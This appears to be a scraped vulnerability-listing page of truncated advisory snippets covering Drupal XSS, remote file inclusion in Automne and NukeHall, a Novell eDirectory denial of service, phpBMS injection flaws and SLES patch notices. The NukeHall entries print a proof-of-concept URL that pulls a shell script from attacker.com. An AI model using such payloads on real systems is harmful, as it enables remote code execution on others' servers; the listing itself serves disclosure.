Drupal 5.x / 6.x Core XSS

The text of this advisory is also available at http://www.madirish.net/?article=441 Description of Vulnerability: - - ----------------------------- Drupal http://drupal.org is a robust content management system CMS written in PHP and MySQL that provides extensibility through various third party...

Automne.ws CMS 4.0.0rc2 Multiple RFI Vulnerability

Exploit for unknown platform in category web applications ================================================== Automne.ws CMS 4.0.0rc2 Multiple RFI Vulnerability ================================================== Automne.ws CMS 4.0.0rc2 Multiple RFI Vulnerability Created By 1nd0n3s14n l4m3r c --...

Remote file inclusion

PHP remote file inclusion vulnerability in modules/pms/index.php in Ciamos CMS 0.9.5 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the modulepath parameter...

NukeHall 0.3 - Multiple Remote File Inclusions

Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg NukeHall PoC : http://server/path/admin/modules/blocks.php?spawroot=http://attacker.com/shell.txt?cmd Vuln : ./nukehall0.3/admin/modules/messages.php line 28 PoC :...

NukeHall 0.3 - Multiple Remote File Inclusions

NukeHall 0.3 - Multiple Remote File Inclusions Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg NukeHall PoC : http://server/path/admin/modules/blocks.php?spawroot=http://attacker.com/shell.txt?cmd Vuln : ./nukehall0.3/admin/modules/messages.php line 28 PoC :...

NukeHall 0.3 Remote File Inclusion

Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg NukeHall PoC : http://0wn3d.com/path/admin/modules/blocks.php?spawroot=http://attacker.com/shell.txt?cmd Vuln : ./nukehall0.3/admin/modules/messages.php line 28 PoC :...

Novell eDirectory 8.8 SP5 Denial Of Service

Product: Novell eDirectory 8.8 sp5 for Windows Vulnerability: Denial of Service Discussion: Vulnerability in '/dhost/modules?I:' Sending long strings to '/dhost/modules?I:' causes a DoS crashing dhost.exe Also in last weeks published another bug in 'modules?L:' It is not patched yet too.. Credits...

Movable Type mt-check.cgi System Information Disclosure

The Movable Type installation on the remote web server is leaking information via mt-check.cgi. This CGI determines if the Perl modules required by Movable Type are installed, and is only intended to be used prior to installation. It discloses path information, operating system type, Perl version...

Novell eDirectory 8.8 SP5 Denial of Service

No description provided by source. Product: Novell eDirectory 8.8 sp5 for Windows Vulnerability: Denial of Service Discussion: Vulnerability in '/dhost/modules?I:' Sending long strings to '/dhost/modules?I:' causes a DoS crashing dhost.exe Also in last weeks published another bug in 'modules?L:' ...

Novell eDirectory 8.8 SP5 Denial of Service

Product: Novell eDirectory 8.8 sp5 for Windows Vulnerability: Denial of Service Discussion: Vulnerability in '/dhost/modules?I:' Sending long strings to '/dhost/modules?I:' causes a DoS crashing dhost.exe Also in last weeks published another bug in 'modules?L:' It is not patched yet too.. Credits...

MDVA-2009:183 : nvidia

This update provides the kernel modules which were not distributed with the last kernel update. %NASLMINLEVEL 70300 @DEPRECATED@ This script has been deprecated as the associated patch is not currently a security fix. Disabled on 2012/09/06. C Tenable Network Security, Inc. This script was...

CVE-2009-3755

Multiple cross-site scripting XSS vulnerabilities in phpBMS 0.96 allow remote attackers to inject arbitrary web script or HTML via the PATHINFO to 1 index.php and 2 modules\base\myaccount.php; and the PATHINFO to 3 modulesview.php, 4 tabledefsoptions.php, and 5 adminsettings.php in...

Cross site scripting

Multiple cross-site scripting XSS vulnerabilities in phpBMS 0.96 allow remote attackers to inject arbitrary web script or HTML via the PATHINFO to 1 index.php and 2 modules\base\myaccount.php; and the PATHINFO to 3 modulesview.php, 4 tabledefsoptions.php, and 5 adminsettings.php in...

Sql injection

Multiple SQL injection vulnerabilities in phpBMS 0.96 allow remote attackers to execute arbitrary SQL commands via the 1 id parameter to modules/bms/invoicesdiscountajax.php, 2 f parameter to dbgraphic.php, and 3 tid parameter in a show action to advancedsearch.php...

Microsoft Office Art Property Table Memory Corruption

Added: 10/22/2009 CVE: CVE-2009-2528 BID: 36650 OSVDB: 58869 Background Microsoft Office is a package that provides word processing, spreadsheet, presentation, e-mail, and calendaring capabilities for Microsoft Windows workstations. MS Office XP 2002 and MS Office 2000 use the Microsoft Windows...

SLES9: Security update for PHP4

The remote host is missing updates to packages that affect the security of your system. One or more of the following packages are affected: php4-zlib php4-shmop php4-ftp php4-filepro php4-mcrypt php4-servlet php4-gmp php4-bz2 php4-snmp php4-mysql php4-mimemagic php4 php4-pgsql modphp4-servlet...

SLES9: Security update for PHP

The remote host is missing updates to packages that affect the security of your system. One or more of the following packages are affected: php4-gd php4-recode apache2-modphp4 php4-mysql php4-exif php4-pear php4-pgsql php4-devel modphp4-core modphp4-servlet php4-servlet php4-fastcgi php4-session...

SLES9: Security update for some XFree86 modules

The remote host is missing updates to packages that affect the security of your system. One or more of the following packages are affected: XFree86-libs XFree86-Xvnc XFree86-server XFree86-Xprt XFree86-Xnest XFree86-Xvfb For more information, please visit the referenced security advisories. More...

SLES9: Security update for Red Carpet

The remote host is missing updates to packages that affect the security of your system. One or more of the following packages are affected: rug libredcarpet-tools rcd-modules xmlrpc-c rcd red-carpet libredcarpet python-openssl libredcarpet-python rcd-modules-devel xmlrpc-c-devel rcd-devel For mor...

SLES9: Security update for Red Carpet

The remote host is missing updates to packages that affect the security of your system. One or more of the following packages are affected: libsoup libredcarpet rug rcd-devel libredcarpet-python rcd rcd-modules-devel red-carpet rcd-modules libredcarpet-tools libsoup-devel More details may also be...